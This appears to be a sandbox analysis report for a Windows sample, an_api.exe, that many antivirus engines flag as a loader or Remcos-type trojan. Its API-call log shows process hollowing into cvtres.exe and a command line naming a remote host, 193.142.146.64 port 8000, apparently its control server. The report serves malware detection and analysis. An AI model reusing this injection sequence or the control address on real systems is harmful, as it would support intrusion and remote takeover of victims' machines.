NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2188	1	0
CreateProcessInternalW Oct. 6, 2024, 6:15 p.m.	thread_identifier: 2248 thread_handle: 0x0000022c process_identifier: 2244 current_directory: filepath: C:\Windows\explorer.exe track: 1 command_line: filepath_r: C:\Windows\explorer.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000230	1	1
CreateProcessInternalW Oct. 6, 2024, 6:15 p.m.	thread_identifier: 2308 thread_handle: 0x00000254 process_identifier: 2304 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" P61I1O 193.142.146.64 8000 O4U27X filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000260	1	1
NtGetContextThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000254	1	0
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¿ëz°à"0ôâ @ `@O Ä@8 H.textøó ô `.rsrcÄ ö@@.reloc@ü@B base_address: 0x00400000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: base_address: 0x00402000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: P8hÄ 444VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfop000004b0,FileDescription 0FileVersion0.0.0.00InternalNameDLL.exe(LegalCopyright 8OriginalFilenameDLL.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0Ô"êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00412000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: ä3 base_address: 0x00414000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2304 process_handle: 0x00000260	1	1
NtSetContextThread Oct. 6, 2024, 6:15 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4264930 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000254 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000254 suspend_count: 1 process_identifier: 2304	1	0
CreateProcessInternalW Oct. 6, 2024, 6:15 p.m.	thread_identifier: 2692 thread_handle: 0x00000000000002b0 process_identifier: 2688 current_directory: filepath: C:\Windows\System32\ctfmon.exe track: 1 command_line: ctfmon.exe filepath_r: C:\Windows\system32\ctfmon.exe stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000000000002b4	1	1
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x000001c8 suspend_count: 1 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x000002cc suspend_count: 1 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2304	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2688	1	0

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Loader.4!c
tehtris	Generic.Malware
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.ObfuscatedPoly.wh
ALYac	Gen:Variant.Ser.Midie.2644
Cylance	Unsafe
VIPRE	Gen:Variant.Ser.Midie.2644
BitDefender	Gen:Variant.Ser.Midie.2644
K7GW	Trojan ( 005bb0d21 )
K7AntiVirus	Trojan ( 005bb0d21 )
Arcabit	Trojan.Ser.Midie.DA54
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (moderate confidence)
ESET-NOD32	a variant of Win32/GenKryptik.HCAH
Avast	Win32:RATX-gen [Trj]
Kaspersky	Trojan.Win32.Loader.lvo
Alibaba	Trojan:Win32/GenKryptik.d156e577
NANO-Antivirus	Virus.Win32.Gen.ccmw
MicroWorld-eScan	Gen:Variant.Ser.Midie.2644
Rising	Trojan.Injector!1.FCCE (CLASSIC)
Emsisoft	Gen:Variant.Ser.Midie.2644 (B)
F-Secure	Trojan.TR/Kryptik.ygjoq
Zillya	Backdoor.Remcos.Win32.7824
McAfeeD	ti!59FE7E6E026D
CTX	exe.trojan.genkryptik
Sophos	Mal/Generic-S
FireEye	Generic.mg.d8b47bd38c34fc55
Webroot	W32.Trojan.Gen
Google	Detected
Avira	TR/Kryptik.ygjoq
Kingsoft	Win32.Trojan.Loader.lvo
Gridinsoft	Trojan.Win32.Kryptik.sa
Microsoft	Trojan:MSIL/Rozena
ZoneAlarm	Trojan.Win32.Loader.lvo
GData	Gen:Variant.Ser.Midie.2644
Varist	W32/ABTrojan.GOUZ-6517
AhnLab-V3	Trojan/Win.Generic.R670029
McAfee	Artemis!D8B47BD38C34
DeepInstinct	MALICIOUS
Malwarebytes	Neshta.Virus.FileInfector.DDS
Ikarus	Win32.Outbreak
TrendMicro-HouseCall	TROJ_GEN.R002H09IT24
Tencent	Malware.Win32.Gencirc.141bc200
MaxSecure	Trojan.Malware.73870532.susgen
Fortinet	W32/GenKryptik.HCAH!tr
AVG	Win32:RATX-gen [Trj]
Paloalto	generic.ml
alibabacloud	Trojan:Win/Ser.MQhVc

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (40 events)

dead_host	192.168.56.103:49193
dead_host	192.168.56.103:49181
dead_host	192.168.56.103:49190
dead_host	192.168.56.103:49205
dead_host	192.168.56.103:49177
dead_host	192.168.56.103:49208
dead_host	192.168.56.103:49174
dead_host	192.168.56.103:49201
dead_host	192.168.56.103:49198
dead_host	192.168.56.103:49170
dead_host	192.168.56.103:49191
dead_host	192.168.56.103:49182
dead_host	192.168.56.103:49187
dead_host	192.168.56.103:49209
dead_host	192.168.56.103:49175
dead_host	192.168.56.103:49206
dead_host	192.168.56.103:49178
dead_host	192.168.56.103:49199
dead_host	192.168.56.103:49171
dead_host	192.168.56.103:49188
dead_host	192.168.56.103:49202
dead_host	192.168.56.103:49195
dead_host	192.168.56.103:49172
dead_host	192.168.56.103:49207
dead_host	192.168.56.103:49196
dead_host	192.168.56.103:49210
dead_host	192.168.56.103:49189
dead_host	192.168.56.103:49203
dead_host	192.168.56.103:49192
dead_host	192.168.56.103:49180
dead_host	192.168.56.103:49185
dead_host	192.168.56.103:49173
dead_host	192.168.56.103:49204
dead_host	192.168.56.103:49176
dead_host	192.168.56.103:49197
dead_host	192.168.56.103:49211
dead_host	192.168.56.103:49169
dead_host	192.168.56.103:49200
dead_host	193.142.146.64:8000
dead_host	192.168.56.103:49166

an_api.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All